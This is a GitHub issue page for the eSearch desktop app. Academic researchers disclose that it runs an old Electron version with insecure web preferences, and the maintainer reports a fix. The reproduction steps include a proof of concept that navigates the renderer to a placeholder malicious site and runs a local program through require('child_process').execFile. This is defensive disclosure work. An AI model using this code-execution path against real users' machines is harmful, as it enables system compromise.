xushengfeng / eSearch

Screenshot, offline OCR, search and translate, reverse image search, pin screenshots to the screen, screen recorder, omnidirectional scrolling screenshot, screen translator
https://esearch-app.netlify.app/
GNU General Public License v3.0
3.66k stars, 284 forks

The eSearch Desktop Application uses an old version of Electron, insecure web preferences, and does not restrict in-app navigation. #203

Closed masood closed 6 months ago

masood commented 10 months ago

Summary:

The eSearch Desktop Application uses an old version of Electron, insecure web preferences, and does not restrict in-app navigation.

Platform(s) Affected:

MacOS, Windows, Linux

Steps To Reproduce:

  1. Open the eSearch Desktop Application from the command line. Add the command-line switch `--remote-debugging-port=8315` while running the application.
  2. Open a web browser on the same device and visit `localhost:8315`. The application can be interacted with via the DevTools protocol.
  3. [Navigate to Malicious Site] Within the address bar, update the location, to say, `window.location = "https://malicious.com"`. This site, loaded within the renderer process, now has access to Node.js libraries.
  4. [Access Node.js Libraries] Within the console, execute `require('child_process').execFile('/Applications/Emacs.app/Contents/MacOS/Emacs')` and observe that, if installed on the system, Emacs opens. Essentially, any malicious code that runs in the renderer process can compromise the user's underlying system.

[Electron.js Version] The eSearch Desktop Application uses an older version of Electron. The framework recommends that updated versions of the framework be used to take advantage of secure defaults and security fixes. [Link]

Mir Masood Ali, PhD student, University of Illinois at Chicago
Mohammad Ghasemisharif, PhD Candidate, University of Illinois at Chicago
Chris Kanich, Associate Professor, University of Illinois at Chicago
Jason Polakis, Associate Professor, University of Illinois at Chicago

xushengfeng commented 6 months ago

I have fixed it in code d249acfe1e595b51bb3716c47f205b9170102d48